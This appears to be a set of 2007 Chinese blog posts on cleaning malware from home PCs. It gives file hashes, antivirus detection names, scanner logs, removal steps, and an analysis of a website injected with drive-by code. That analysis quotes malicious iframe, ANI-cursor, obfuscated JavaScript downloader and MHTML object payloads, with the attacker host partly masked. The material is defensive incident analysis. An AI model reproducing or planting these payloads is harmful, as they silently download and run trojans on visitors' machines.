MD5 : b009e2c68ad3be89fc97365769f50a3a

Kaspersky报为 Trojan-PSW.Win32.OnLineGames.bs，瑞星报为 Trojan.PSW.OnlineGames.xd

文件说明符 : C:\WINDOWS\system32\dongdi.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-22 19:25:41
修改时间 : 2007-3-22 19:25:42
访问时间 : 2007-5-8 0:0:0
大小 : 70413 字节 68.781 KB
MD5 : c95ddf24696e51abcc08d83a44dba90b

Kaspersky报为 not-a-virus:AdWare.Win32.Delf.g，瑞星报为 Trojan.DL.Bho.iv

文件说明符 : C:\WINDOWS\system32\wanmei.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-22 19:35:52
修改时间 : 2007-3-22 19:35:54
访问时间 : 2007-5-8 0:0:0
大小 : 21657 字节 21.153 KB
MD5 : 9c97cc090d9c87fcb797a212e12b327f

文件说明符 : C:\WINDOWS\system32\moyu.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-22 19:35:53
修改时间 : 2007-3-22 19:35:56
访问时间 : 2007-5-8 0:0:0
大小 : 26037 字节 25.437 KB
MD5 : 434ebf20c6532f2fec71c208e53f42aa

文件说明符 : C:\WINDOWS\system32\rs.bin
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-22 19:25:42
修改时间 : 2007-3-22 19:35:58
访问时间 : 2007-5-8 0:0:0
大小 : 58369 字节 57.1 KB
MD5 : 536a919d0cc058c00a73cb1a3f266f12

文件说明符 : C:\WINDOWS\system32\chajian.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-22 19:35:55
修改时间 : 2007-3-22 19:35:58
访问时间 : 2007-5-8 0:0:0
大小 : 70413 字节 68.781 KB
MD5 : c95ddf24696e51abcc08d83a44dba90b

Kaspersky报为 not-a-virus:AdWare.Win32.Delf.g，瑞星报为 Trojan.DL.Bho.iv

文件说明符 : C:\WINDOWS\system32\update.txt.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-24 9:7:33
修改时间 : 2007-3-24 9:7:34
访问时间 : 2007-5-8 0:0:0
大小 : 23657 字节 23.105 KB
MD5 : c385ed2bc5ea41568892a4a0b6e5f0ab

瑞星报为 Trojan.DL.Multi.whn

文件说明符 : C:\WINDOWS\system32\update.txt.bat
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-24 9:7:33
修改时间 : 2007-3-24 9:7:34
访问时间 : 2007-5-8 0:0:0
大小 : 23657 字节 23.105 KB
MD5 : c385ed2bc5ea41568892a4a0b6e5f0ab

文件说明符 : C:\WINDOWS\system32\xy2.exe.bat
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-3-30 9:35:7
修改时间 : 2007-3-30 9:35:8
访问时间 : 2007-5-8 0:0:0
大小 : 20845 字节 20.365 KB
MD5 : c168697e596c7183ab28eee23e3ed73e

文件说明符 : C:\WINDOWS\system32\xy2ok.exe.bat
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-2 8:18:30
修改时间 : 2007-4-2 8:18:32
访问时间 : 2007-5-8 0:0:0
大小 : 32380 字节 31.636 KB
MD5 : c014040a36e1ae2c4294a18d24756c88

Kaspersky报为 Backdoor.Win32.PcClient.za，瑞星报为 Backdoor.Gpigeon.voo

文件说明符 : C:\WINDOWS\system32\mutou.exe.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-5 8:31:32
修改时间 : 2007-4-16 8:18:46
访问时间 : 2007-5-8 0:0:0
大小 : 11264 字节 11.0 KB
MD5 : 900c5ccc44a5f7a58952f4bdac0c7e5e

文件说明符 : C:\WINDOWS\system32\mutou.exe.bat
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-5 9:58:1
修改时间 : 2007-4-16 8:18:48
访问时间 : 2007-5-8 0:0:0
大小 : 11264 字节 11.0 KB
MD5 : 900c5ccc44a5f7a58952f4bdac0c7e5e

文件说明符 : C:\WINDOWS\system32\szzy.exe.bat
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-18 12:52:40
修改时间 : 2007-4-18 12:52:42
访问时间 : 2007-5-8 0:0:0
大小 : 24086 字节 23.534 KB
MD5 : 47c6c4411c19f9d3c8f321b9eb299dc1

用bat_do将其中一部分打包备份。

下载Dr.Web CureIt扫描，结果如下：
==========================
Dr.Web(R) Scanner for Windows v4.33.2 (4.33.2.10067)
Copyright (c) Igor Daniloff, 1992-2006
Log generated on: 2007-05-08, 12:18:30 [Administrator]
Operating system:Windows XP Professional x86 (Build 2600), Service Pack 2
==========================
c:\documents and settings\administrator\local settings\temp\hyso.exe infected with Trojan.PWS.Wsgame - deleted
c:\documents and settings\administrator\local settings\temp\mhso.exe infected with Trojan.PWS.Wsgame - deleted
c:\documents and settings\administrator\local settings\temp\myso.exe infected with Trojan.PWS.Wsgame- deleted
c:\documents and settings\administrator\local settings\temp\qqso.exe infected with Trojan.PWS.Wsgame- deleted
>c:\documents and settings\administrator\local settings\temp\rundl132.exe infected with Trojan.PWS.Wsgame- deleted
c:\documents and settings\administrator\local settings\temp\rxso.exe infected with Trojan.PWS.Wsgame- deleted
>c:\documents and settings\administrator\local settings\temp\winlog0n.exe infected with Trojan.PWS.Wsgame- deleted
c:\documents and settings\administrator\local settings\temp\ztso.exe infected with Trojan.PWS.Wsgame- deleted
c:\program files\common files\microsoft shared\msinfo\syswfgqq2.dll infected with Trojan.PWS.Qqpass.623 - deleted
c:\windows\jts3.exe - read error
>c:\windows\kernelmh.exe infected with Trojan.PWS.Wow - deleted
c:\windows\qqs3.exe infected with Trojan.PWS.Wsgame- deleted
c:\windows\wgs3.exe infected with Trojan.PWS.Wsgame- deleted
c:\windows\wls3.exe infected with Trojan.PWS.Wsgame- deleted
c:\windows\wms3.exe - read error
c:\windows\wos3.exe infected with Trojan.PWS.Wsgame- deleted
C:\Documents and Settings\Administrator\Local Settings\Temp\mhso0.dll infected with Trojan.PWS.Wsgame- will be cured after reboot
C:\Documents and Settings\Administrator\Local Settings\Temp\ztso0.dll infected with Trojan.PWS.Wsgame- will be cured after reboot
C:\Documents and Settings\Administrator\Local Settings\Temp\rxso0.dll infected with Trojan.PWS.Wsgame- will be cured after reboot
C:\Documents and Settings\Administrator\Local Settings\Temp\wos0.dll infected with Trojan.PWS.Wsgame- will be cured after reboot
C:\Documents and Settings\Administrator\Local Settings\Temp\wls0.dll infected with Trojan.PWS.Wsgame- will be cured after reboot
C:\Documents and Settings\Administrator\Local Settings\Temp\iexpl0re.exe - read error
C:\Documents and Settings\Administrator\Local Settings\Temp\wgs0.dll infected with Trojan.PWS.Wsgame- will be cured after reboot
C:\Documents and Settings\Administrator\Local Settings\Temp\qqso0.dll infected with Trojan.PWS.Wsgame- will be cured after reboot
C:\Documents and Settings\Administrator\Local Settings\Temp\hyso0.dll infected with Trojan.PWS.Wsgame- will be cured after reboot
>C:\Documents and Settings\Administrator\Local Settings\Temp\~Tm22.tmp.rom probably infected with DLOADER.Trojan
C:\Documents and Settings\Administrator\Local Settings\Temp\~Tm23.tmp..rom infected with Trojan.PWS.Wsgame- will be cured after reboot
>C:\Program Files\Common Files\System\commond.pifC:\Program Files\Internet Explorer\WINLOGON.EXE infected with Trojan.PWS.Wsgame- deleted
C:\Program Files\Thunder Network\Thunder\Program\Ad\n1175509284861.swf infected with Trojan.PWS.Wsgame- deleted
>C:\WINDOWS\KB726255.logC:\WINDOWS\SMSS.EXE infected with Trojan.PWS.Wsgame- deleted
C:\WINDOWS\8Sy.exe infected with Trojan.PWS.Wsgame- deleted
C:\WINDOWS\9Sy.exe infected with Trojan.PWS.Wsgame- deleted
C:\WINDOWS\wms3.exe - read error
C:\WINDOWS\jts3.exe - read error
C:\WINDOWS\system32\sysi.dll probably infected with DLOADER.Trojan
C:\WINDOWS\system32\syst.dll probably infected with DLOADER.Trojan
>C:\WINDOWS\system32\moyu.exe>C:\WINDOWS\system32\fengyun.exe infected with Trojan.PWS.Qqpass.503 - deleted
C:\WINDOWS\system32\chuanqi.exe infected with Trojan.PWS.Lineage - deleted
>C:\WINDOWS\system32\windowstools.exe infected with Trojan.PWS.Gamania - deleted
>C:\WINDOWS\system32\xy2.exe.bat>C:\WINDOWS\system32\xy2ok.exe.bat probably infected with BACKDOOR.Trojan
C:\WINDOWS\system32\s159.exe.bat - read error
>>C:\WINDOWS\system32\szzy.exe.bat probably infected with DLOADER.Trojan
C:\WINDOWS\system32\WOW3.exe.bat - read error
>C:\WINDOWS\system32\sl_xy2.exe.bat infected with Trojan.PWS.Wsgame- deleted
>C:\WINDOWS\system32\sl_my0324.exe.bat infected with Trojan.PWS.Wsgame- deleted
C:\WINDOWS\system32\feizhujixi.exe.bat infected with Trojan.PWS.Wsgame- deleted
>C:\WINDOWS\system32\sl_wl0325.exe.bat infected with Trojan.PWS.Wsgame- deleted

到 http://endurer.ys168.com/下载 HijackThis，修复除O24以外的项目；下载 auto_del下次启动时删除漏网的（添加待删文件时，如果提示“文件不存在或者是目录，是否添加？”时，点击“是”）。
安装瑞星卡卡安全助手，卸载O24中的项目。

又遇劫持浏览器的Trojan.StartPage.tns/nwlnksipx.sys

endurer 原创
2007-05-07 第1版

昨天一位朋友说他的电脑查杀出了病毒，让偶帮助看看。

下载了 pe_xscan 扫描 log 并分析，发现如下可疑项：

pe_xscan 07-03-17 by Purple Endurer
2007-5-6 10:35:46
Windows XP Service Pack 2(5.1.2600)
管理员用户组

O2 - BHO IEObject Class - {5F5422F7-7159-4CB6-BE7D-2C7EED492762} - C:\PROGRA~1\COMMON~1\yehoo\yehoo.dll

O4 - Global Startup: -20676.lnk -> C:\WINDOWS\system32\-20676.exe
O4 - Global Startup: -20844.lnk -> C:\WINDOWS\system32\-20844.exe
O4 - Global Startup: rdgjhd.lnk -> C:\WINDOWS\system32\rdgjhdi.exe

O23 - 服务: nwlnksipx (nwlnksipx) - C:\WINDOWS\system32\drivers\nwlnksipx.sys(自动)

用 HijackThis 和 瑞星卡卡安全助手修复，再用auto_del 在下次启动时删除 nwlnksipx.sys。

这个东东曾在 遭遇万能搜索(WANSO,Trojan.AdPlayer.a)等 中遇到过。

文件说明符 : c:\windows\system32\drivers\nwlnksipx.sys
属性 : A---
语言 : 英语(美国)
文件版本 : 5.1.2600.80
说明 : NWLINK2 SIPX Protocol Driver
版权 : Microsoft Corporation. All rights reserved.
备注 :
产品版本 : 5.1.2600.80
产品名称 : Microsoft Windows Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : nwlnksipx.sys
源文件名 : nwlnksipx.sys
创建时间 : 2004-8-17 20:0:0
修改时间 : 2004-8-17 20:0:0
访问时间 : 2007-5-6 10:32:30
大小 : 6144 字节 6.0 KB
MD5 : cbb860ee6715a2a968d19d0cd5eaaa7e

Kaspersky 报为 Trojan.Win32.StartPage.amo，瑞星 报为 Trojan.StartPage.tns。

Scanned file: nwlnksipx.sys - Infected

nwlnksipx.sys - infected by Trojan.Win32.StartPage.amo Statistics: Known viruses: 315008 Updated: 07-05-2007 File size (Kb): 6 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0

某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码

endurer 原创
2007-04-30 第1版

该网站的留言板页面：
/---
＜Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"＞＜/iframe＞
---/

被植入代码：
/---
＜iframe src=hxxp://cool***.4*7*5***55.com/k3.htm width=100 height=1 frameborder=0＞＜/iframe＞
---/

hxxp://cool***.4*7*5***55.com/k3.htm 包含3段恶意代码。

恶意代码段1：
/---
＜DIV style="CURSOR: url(hxxp://cool***.4*7*5***55.com/9.gif)"＞＜/DIV＞＜/DIV＞
---/

hxxp://cool***.4*7*5***55.com/9.gif （瑞星报为Hack.SuspiciousAni
）中包含信息：“By Mr.owen[F.S.T] ”，利用 ANI漏洞下载 xx.exe

文件说明符 : d:\test\xx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-30 12:58:12
修改时间 : 2007-4-30 12:58:6
访问时间 : 2007-4-30 13:10:2
大小 : 14902 字节 14.566 KB
MD5 : 046257b53f474770dd1e2a149b2ba823

Kaspersky 报为 Trojan-Downloader.Win32.Small.eqe，瑞星报为：Trojan.DL.Inject.xz。

恶意代码段2：
/---
var J=function(m){return String.fromCharCode(m^99)};
eval(J(5)……（略）……+J(67)+'');
---/

解密结果为JavaScript脚本，功能是利用 Microsoft.XMLhttp 和 scrīpting.FileSystemObject 下载文件 kehu0739.exe，保存到%windir%，文件名由自定义函数：

/---
function gn（n）｛var number ＝ Math.random（）＊n;
return ＇~tmp＇＋　＇.tmp＇；｝
---/
生成，即~tmp.tmp。然后通过 Shell.Application 对象Q 的 ShellExecute 方法 执行命令： %windir%\system32\cmd.exe /c %windir%\~tmp.tmp 来运行。

恶意代码段3：
/---
＜OBJECT style="display:none" type="text&#47x&#45s&#99riptlet" data="MK:@MSITSto&#114e&#58m&#104tml:c:\.mht!hxxp://cool***.4*7*5***55.com/count.html::/%6C%65%66t.htm"＞＜/OBJECT＞
---/

解密后为
/---
＜OBJECT style="display:none" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:\.mht!hxxp://cool***.4*7*5***55.com/count.html::/%6C%65%66t.htm"＞＜/OBJECT＞
---/

hxxp://cool***.4*7*5***55.com/count.html 其实是个CHM文件，释放并运行文件QQ.EXE
/---
文件说明符 : d:\test\QQ.EXE
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-30 13:39:46
修改时间 : 2007-4-30 13:39:46
访问时间 : 2007-4-30 13:41:52
大小 : 11208 字节 10.968 KB
MD5 : f04973fb8267827f347594b373732290

nSPack 1.3 -＞ North Star/Liu Xing Ping
---/

瑞星报为：Trojan.DL.Agent.alw

Scanned file: QQ.EXE - Infected

QQ.EXE - infected by Trojan-Downloader.Win32.Agent.ue Statistics: Known viruses: 307397 Updated: 30-04-2007 File size (Kb): 11 Virus bodies: 1 Files: 1 Warnings: 0 Archives: 0 Suspicious: 0